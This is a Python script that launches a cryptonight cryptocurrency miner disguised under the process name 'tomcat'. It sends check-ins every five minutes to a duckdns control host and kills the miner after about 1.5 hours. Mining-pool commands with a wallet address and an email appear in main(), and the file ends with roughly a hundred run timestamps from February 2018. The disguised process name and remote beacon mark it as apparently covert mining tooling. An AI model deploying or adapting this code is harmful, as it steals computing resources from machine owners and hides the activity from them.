import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 14:55:05.988836
#2018-02-17 16:42:07.625656
#2018-02-17 18:29:07.605209
#2018-02-17 20:18:06.924257
#2018-02-17 22:05:06.122162
#2018-02-17 23:49:04.076792
#2018-02-18 01:39:06.260978
#2018-02-18 03:26:02.188646
#2018-02-18 05:14:04.123595
#2018-02-18 07:06:01.347185
#2018-02-18 08:54:04.553268
#2018-02-18 10:41:03.805780
#2018-02-18 12:26:04.705782
#2018-02-18 14:13:07.623119
#2018-02-18 16:03:05.875185
#2018-02-18 17:51:06.542075
#2018-02-18 19:38:05.769276
#2018-02-18 21:23:05.126642
#2018-02-18 23:12:04.147212
#2018-02-19 00:58:01.356764
#2018-02-19 02:46:01.283413
#2018-02-19 04:32:05.514420
#2018-02-19 06:17:01.720738
#2018-02-19 08:05:01.337165
#2018-02-19 09:55:07.669642
#2018-02-19 11:44:02.101754
#2018-02-19 13:31:05.926370
#2018-02-19 15:19:03.891774
#2018-02-19 17:06:04.357273
#2018-02-19 18:56:07.063427
#2018-02-19 20:43:08.077098
#2018-02-19 22:32:07.317329
#2018-02-20 00:17:06.575385
#2018-02-20 02:05:03.631052
#2018-02-20 03:54:08.066544
#2018-02-20 05:39:02.124542
#2018-02-20 07:24:04.574374
#2018-02-20 09:09:04.192538
#2018-02-20 10:51:09.132345
#2018-02-20 12:38:07.890694
#2018-02-20 14:23:07.328923
#2018-02-20 16:09:01.835392
#2018-02-20 17:53:06.804370
#2018-02-20 19:43:08.755986
#2018-02-20 21:29:05.940033
#2018-02-20 23:12:07.313608
#2018-02-21 00:55:08.625263
#2018-02-21 02:39:06.430580
#2018-02-21 04:27:05.502586
#2018-02-21 06:14:10.802961
#2018-02-21 08:00:08.800279
#2018-02-21 09:47:01.434298
#2018-02-21 11:35:06.839158
#2018-02-21 13:23:09.959866
#2018-02-21 15:07:01.438695
#2018-02-21 16:56:12.812456
#2018-02-21 18:44:07.644327
#2018-02-21 20:33:02.054657
#2018-02-21 22:20:08.987855
#2018-02-22 00:09:05.882118
#2018-02-22 01:56:04.308848
#2018-02-22 03:43:01.788137
#2018-02-22 05:29:06.382578
#2018-02-22 07:14:01.802272
#2018-02-22 09:02:05.764305
#2018-02-22 10:49:02.192791
#2018-02-22 12:35:11.132460
#2018-02-22 14:20:14.196778
#2018-02-22 16:08:01.784598
#2018-02-22 17:53:07.582579
#2018-02-22 19:41:04.186588
#2018-02-22 21:32:09.526679
#2018-02-22 23:19:04.274370
#2018-02-23 01:06:10.220175
#2018-02-23 02:54:05.533760
#2018-02-23 04:34:03.995449
#2018-02-23 06:19:05.077828
#2018-02-23 08:06:01.878167
#2018-02-23 10:23:07.445270
#2018-02-23 12:18:07.257121
#2018-02-23 14:07:05.008146
#2018-02-23 15:56:08.019058
#2018-02-23 17:42:08.830927
#2018-02-23 19:29:01.433236
#2018-02-23 21:12:07.155648
#2018-02-23 23:01:06.880664
#2018-02-24 00:47:04.150986
#2018-02-24 02:36:07.292781
#2018-02-24 04:29:07.629539
#2018-02-24 06:14:07.373963
#2018-02-24 08:03:01.387227
#2018-02-24 09:46:05.845175
#2018-02-24 11:42:07.411919
#2018-02-24 13:34:04.061146
#2018-02-24 15:21:04.604736
#2018-02-24 17:11:03.695177
#2018-02-24 19:02:06.817776
#2018-02-24 20:51:06.326467
#2018-02-25 01:21:01.932021
#2018-02-25 05:28:01.281685
#2018-02-25 11:35:07.466295